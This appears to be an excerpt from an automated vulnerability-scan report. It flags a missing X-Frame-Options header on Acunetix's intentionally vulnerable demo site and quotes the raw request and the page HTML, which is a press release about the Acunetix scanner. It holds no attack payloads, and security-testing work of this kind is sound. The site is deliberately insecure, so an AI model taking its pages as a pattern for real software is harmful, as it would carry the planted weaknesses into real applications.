l4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q944e4UqgWJpySuZGYD9y7m9ZXo/Q==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 17888Response body (17888 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+L5/dFSm3qL6WSrtXoxMhBWz78mQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" 